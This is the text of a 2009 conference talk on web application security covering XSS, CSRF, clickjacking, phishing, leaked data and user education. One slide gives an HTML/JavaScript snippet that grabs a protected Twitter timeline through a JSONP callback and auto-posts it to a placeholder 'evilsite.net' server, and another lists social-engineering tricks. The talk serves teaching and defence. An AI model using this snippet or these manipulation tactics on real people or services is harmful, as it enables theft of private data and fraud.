Embed Size (px)
DESCRIPTION
My talk at the Web Directions North conference in Denver, Colorado. It covers basic technologies and methodologies of attacks of web applications, what we can do against them and a plea for making interfaces more educational about security than scaring users.
Citation preview
Things that go bump on the web
Christian Heilmann | http://wait-till-i.com | http://scriptingenabled.org
Web Directions North, Denver, Colorado, February 2009
Disclaimer:The following is a personal presentation and the views do not necessarily reflect those of my employer or the conference organizer!
There will be strong language, public exposure (of security issues) and some strong opinions.
Viewer discretion is advised.
Hello, I am Chris.
I’m here today to talk to you about web application
security.
I’ve seen several security presentations myself.
And they fall into a few categories:
Technical mumbo jumbo that leaves you feeling
inadequate and scared.
“Neener Neener, look what I can hack” show-offs.
“Use our systems or you’ll be dead tomorrow.” sales
pitches.
I wanted to avoid anything like that.
My intention is not to leave you feeling patronised...
...confused or scared.
I want to point out several basics of web security...
...and offer some ideas of how you can prevent the worst and help us make the web
safer.
Here’s what I will go through:
Close the gates.
Clean up your mess.
Don’t breed idiots.
Stay up-to-date.
Constant Vigilance, Harry!
censored
Close the Gates!
Here’s a quick roundup of attack technologies and
methodologies you should know about.
XSS!
https://www.owasp.org/index.php?title=XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS means that people can successfully inject something into your sites that shouldn’t
be there.
Successfully injecting JavaScript in your site allows
me to steal and fake the identity of your users or
yourself.
SQL Injection
Always filter SQL statements from your requests!
CSRF!
http://en.wikipedia.org/wiki/Cross-site_request_forgery
CSRF happens when you have predictable urls to initiate
actions – like deleting a form post or transferring money.
This url could then be called in the background from
another site – via an image or a form submission in
JavaScript.
Clickjacking
http://ha.ckers.org/blog/20080915/clickjacking/
Clickjacking is a trick to cover a real interface in an IFRAME
with a transparent GIF or Flash movie...
...to send you to another site or pretend there was a
problem and asking for you to log in again.
Isn’t it interesting that the verified by visa security tool
makes that look very normal?
Phishing!
Phishing means showing a familiar interface and luring
users into entering data.
The only way to prevent this is let the user choose a secret
only they know...
...like the Yahoo sign-in seal.
I approve of this!
XBCR!
http://en.wikipedia.org/wiki/Cross-boundary-currency-request
FAKE!
Clean up your mess!
A lot of security problems happen because people leave
data behind.
This can be in their HTML.
Comments are not a good tool to turn off sections of the
page that shouldn’t be available yet!
Or it can be in JavaScript...
Or on their server:
Or in their browsers.
I built TweetEffect.com, a small tool to check your
twitter follower changes.
And then I got this email (not real size, it had to be resized)
I checked the user name and saw nothing – just a “this user
isn’t available”.
What happened?
Apparently this person was logged in and of course that
way authenticated to see the updates.
The same thing happens when one of the friends of that person is logged in!
So, this is interesting...
Step 1: Log in yourself
Step 2: Get his list of followers
Step 3: Set the trap
You can get a user’s updates with a simple REST call:
http://twitter.com/statuses/user_timeline/codepo8.xml?
count=200
<img src=”tuna_funny.jpg” alt=”tee hee hee”><form method=”post” action=”http://evilsite.net/leech.php”><input type=”hidden” value=”” name=”muahaha”></form>
<script>function evilgenius(o){ var m=document.getElementById(‘muahaha’); m.value=o; document.forms[0].submit();}</script><script src=”http://twitter.com/statuses/user_timeline/tuna.json?count=200&callback=evilgenius”></script>
...alternatively use Ajax...
Step 4: Contact random friend of tuna to visit the site.
As they are authenticated the data will be returned without
a question and sent to your server.
Learnings: Do not trust browsers, ever!
A lock on a screen does not mean protection!
You are as protected as the people you deal with.
Which brings me to the next point...
I am now going to be a bit daring.
I will ask you to question common ways of thinking and considering alternatives.
DANGER!
Don’t breed idiots!
I’m a designer, why should I care about web application security?
Designers help users do the right things in the easiest and
most effective manner.
We have the chance to increase usability to stop
people repeatedly shooting themselves in the foot.
None of this!
Users should be conditioned not to trust blindly.
Yet we tell them to store their information on computers and give them an option to
stay logged in.
Getting information out of people is easy:
Be confident, show (or fake) authority, keep things
confusing and give them a wrong sense of urgency.
“Look, your wireless is flaky, I am in the middle of a phone conference and it keeps dropping out. Is there a wired connection in this lounge?”
“Do you have a first class ticket?”
“I just asked you where the wired connection is, this is an urgent
conference and I need to answer this now!”
= Chris had some hours in the first class lounge!
Why did that work?
People are used to being treated like this.
We also don’t tell users off for using clever passwords like “password” or “happiness”.
Don’t make your end users suffer for your lack of
security.
CAPTCHAS solve nothing!
http://caca.zoy.org/wiki/PWNtcha
Here’s a challenge for you design and marketing
wizards:
How about an interface that makes it fun to change your
password every week?
And here’s a challenge for security experts:
Use HUMAN language!
“confused deputy”
“man in the middle attack”
“the password antipattern”
How about
“giving your login and password for one system to another system is like writing your pin number on your credit card and asking a stranger to buy something for you!”
Stay up to date!
There is no security in sticking with outdated systems.
Therefore make sure to keep your server, your client
software and your operating system up-to-date.
Even if companies offer a way out not to “break the web”.
None of this!
This also applies to your skills.
If you *don’t* want to be the guardian against evil and
have *your butt on the line* when things to bump...
...build with frameworks!
Symfony, Django, Rails all offer out-of-the-box filtering
and sanitization.
If there is a vulnerability, it can be fixed by a lot of people and pushed out as an update.
Constant vigilance!Screenshot from Harry Potter and the Goblet of fire, found on some blog but probably courtesy of Warner Brothers
The most important thing for you is to constantly be aware of what your servers are up
to.
This *does* include your blog and portfolio!
Any server can be a spam hub or part of an attack network.
Your friends are:
Server logs
Statistics software
Don’t just look at the numbers
More interesting are
“posted forms”
And “page query terms”
Keep up-to-date with what’s happening in web security.
http://simonwillison.net/tags/security/
Stay curious to poke at things and find out their flaws and
report them!
Christian Heilmann
http://wait-till-i.com
http://scriptingenabled.org
http://twitter.com/codepo8
T H A N K S !
Images by icanhazcheeseburger.com, failblog.org,kqe.de and from the web.Eye photo: http://flickr.com/photos/jaredmoo/2113943480
